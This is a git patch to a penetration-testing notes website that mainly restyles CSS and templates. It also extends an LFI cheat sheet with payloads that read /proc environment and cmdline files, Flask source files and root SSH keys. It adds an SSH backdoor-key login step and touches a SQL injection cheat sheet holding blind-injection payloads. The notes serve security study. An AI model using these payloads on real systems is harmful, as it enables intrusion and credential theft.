From 2d8f726b9c6da30aca0209b9e63cf38d63d64470 Mon Sep 17 00:00:00 2001 From: hdks Date: Sat, 15 Jun 2024 18:35:24 +0900 Subject: [PATCH] updated LFI --- _config.ts | 4 +- src/_components/header.vto | 4 +- src/_includes/layouts/exploit.vto | 11 +++--- .../network/protocol/ssh-pentesting.md | 13 ++++++- .../web/security-risk/file-inclusion.md | 17 ++++++++- .../sql-injection-cheat-sheet.md | 8 ++-- src/styles.css | 37 +++++++++++-------- 7 files changed, 62 insertions(+), 32 deletions(-) diff --git a/_config.ts b/_config.ts index c608e6d..3ccafcb 100644 --- a/_config.ts +++ b/_config.ts @@ -92,7 +92,7 @@ site 'transparent': 'transparent', }, fontFamily: { - basisc: ["sans-serif"], + base: ["Calibri, sans-serif"], title: ["courier"], } } @@ -123,7 +123,7 @@ site.process([".html"], (pages: Lume.Page[]) => { const aElem = page.document.createElement('a'); aElem.setAttribute("href", `#${c.slug}`); aElem.innerHTML = c.text; - aElem.classList.add('text-sm'); + aElem.classList.add('text-md'); aElem.classList.add('hover:brightness-200'); aElem.classList.add('break-words'); diff --git a/src/_components/header.vto b/src/_components/header.vto index 09ee1a5..97d172e 100644 --- a/src/_components/header.vto +++ b/src/_components/header.vto @@ -2,7 +2,7 @@
@@ -12,7 +12,7 @@ {{# Search UI #}} - +
{{# Links #}} diff --git a/src/_includes/layouts/exploit.vto b/src/_includes/layouts/exploit.vto index 04e1c4d..2d162e5 100644 --- a/src/_includes/layouts/exploit.vto +++ b/src/_includes/layouts/exploit.vto @@ -8,7 +8,8 @@ bodyClass: body-exploit {{# Left side #}} \ No newline at end of file +
diff --git a/src/exploit/network/protocol/ssh-pentesting.md b/src/exploit/network/protocol/ssh-pentesting.md index 4ab46ef..e7d61ba 100644 --- a/src/exploit/network/protocol/ssh-pentesting.md +++ b/src/exploit/network/protocol/ssh-pentesting.md @@ -7,7 +7,7 @@ tags: - Privilege Escalation refs: - https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf -date: 2024-04-13 +date: 2024-06-15 draft: false --- @@ -259,6 +259,17 @@ In remote machine, echo '> /home//.ssh/authorized_keys ``` +### 4. Login with Private Key + +In local machine, we have a SSH private key in local machine so we can login the target SSH server with it. + +```bash +# Change permission of the private key ('key', here) +chmod 600 key +# Login with it +ssh victim@ -i key +``` +
## SSH Server diff --git a/src/exploit/web/security-risk/file-inclusion.md b/src/exploit/web/security-risk/file-inclusion.md index 8ec8211..d98d6a5 100644 --- a/src/exploit/web/security-risk/file-inclusion.md +++ b/src/exploit/web/security-risk/file-inclusion.md @@ -5,7 +5,7 @@ tags: - Web refs: - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion -date: 2024-04-01 +date: 2024-06-15 draft: false --- @@ -111,8 +111,11 @@ When our payload is successful, we can additionaly investigate local files and r ?pgae=/root/.profile ?page=/root/.ssh/id_rsa -# Environment variables +# Processes +?page=/proc/net/tcp +?page=/proc/self/cmdline ?page=/proc/self/environ +?page=/proc//cmdline ?page=/proc//environ # Mail @@ -173,6 +176,16 @@ When our payload is successful, we can additionaly investigate local files and r ?page=/etc/php/x.x/cli/php.ini ?page=/etc/php/x.x/fpm/php.ini +# Flask +?page=index.html +?page=../__init__.py +?page=../app.py +?page=../db.py +?page=../main.py +?page=/home///app.py +?page=/opt//app.py +?page=/srv//app.py + # BIND ?page=/etc/bind/named.conf ?page=/etc/bind/named.conf.options diff --git a/src/exploit/web/security-risk/sql-injection-cheat-sheet.md b/src/exploit/web/security-risk/sql-injection-cheat-sheet.md index 2fd202a..81e6ab9 100644 --- a/src/exploit/web/security-risk/sql-injection-cheat-sheet.md +++ b/src/exploit/web/security-risk/sql-injection-cheat-sheet.md @@ -112,7 +112,7 @@ admin or 1=1# ## Blind Injection - Timing -Reference: [https://book.hacktricks.xyz/pentesting-web/sql-injection#confirming-with-timing](https://book.hacktricks.xyz/pentesting-web/sql-injection#confirming-with-timing) +Reference: [HackTricks](https://book.hacktricks.xyz/pentesting-web/sql-injection#confirming-with-timing) Using **sleep** method for each query, if results are displayed with a delay, SQLi affects that. @@ -152,7 +152,7 @@ test' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))) ## WAF Bypass -Reference: [https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF](https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF) +Reference: [OWASP](https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF) If website filters to prevent our payloads, we need to bypass the filter. @@ -465,7 +465,7 @@ After execution, we may get a shell of target system. ## Error-based SQLi -Reference: [https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based](https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based) +Reference: [PortSwigger](https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based) We might be able to gather information of the database by leading the error message. We can construct SQLi while checking error messages. Here are MySQL injection examples. @@ -628,7 +628,7 @@ We can write arbitary code to a file as below. ## XML Filter Bypass -Reference: [https://portswigger.net/web-security/sql-injection](https://portswigger.net/web-security/sql-injection) +Reference: [PortSwigger](https://portswigger.net/web-security/sql-injection) ```xml diff --git a/src/styles.css b/src/styles.css index 473f99a..6db3994 100644 --- a/src/styles.css +++ b/src/styles.css @@ -20,6 +20,9 @@ --color-emerald-dark: #064e3b; --color-emerald-light: #059669; + --font-family-base: Calibri, sans-serif; + --font-family-title: courier, sans-serif; + /* Pagefind UI */ --pagefind-ui-scale: 0.6; --pagefind-ui-primary: red; @@ -31,7 +34,12 @@ /* --pagefind-ui-border-radius: 6px; */ --pagefind-ui-image-border-radius: 2px; --pagefind-ui-image-box-ratio: 3 / 1; - --pagefind-ui-font: sans-serif; + --pagefind-ui-font: var(--font-family-base); +} + +* { + scrollbar-color: var(--color-pink-dark) transparent; + scrollbar-width: thin; } html,body { @@ -40,20 +48,13 @@ html,body { overflow-x: hidden; } -a { - color: var(--color-pink-light); +body { + font-family: var(--font-family-base); + font-size: 1.1em; } -/* Scroll bar */ -::-webkit-scrollbar { - width: 5px; - height: 5px; -} -::-webkit-scrollbar-thumb { - background: var(--color-pink-dark); -} -::-webkit-scrollbar-corner { - background: none; +a { + color: var(--color-pink-light); } /* Pagefind */ @@ -71,6 +72,7 @@ a { #search .pagefind-ui__search-input { transition: 0.1s; + font-size: 1.1em; } #search .pagefind-ui__search-input:focus { outline: 1.4px solid var(--color-pink-light); @@ -95,6 +97,7 @@ a { #search .pagefind-ui__message { margin: 0; + font-size: 0.9em; } #search .pagefind-ui__results-area { @@ -118,7 +121,7 @@ a { #search .pagefind-ui__result-link { color: var(--color-pink-light); - font-size: 1.1em; + font-size: 1.3em; } #search .pagefind-ui__result-link:hover { filter: brightness(1.4); @@ -140,10 +143,13 @@ a { } #search .pagefind-ui__button { + height: initial; + padding: 8px 0; + font-size: 1.05em; color: var(--color-pink-light); } #search .pagefind-ui__button:hover { - filter: brightness(1.4); + filter: brightness(1.2); } /* Code blocks */ @@ -279,5 +285,4 @@ td { } @media (min-width: 640px) { - } \ No newline at end of file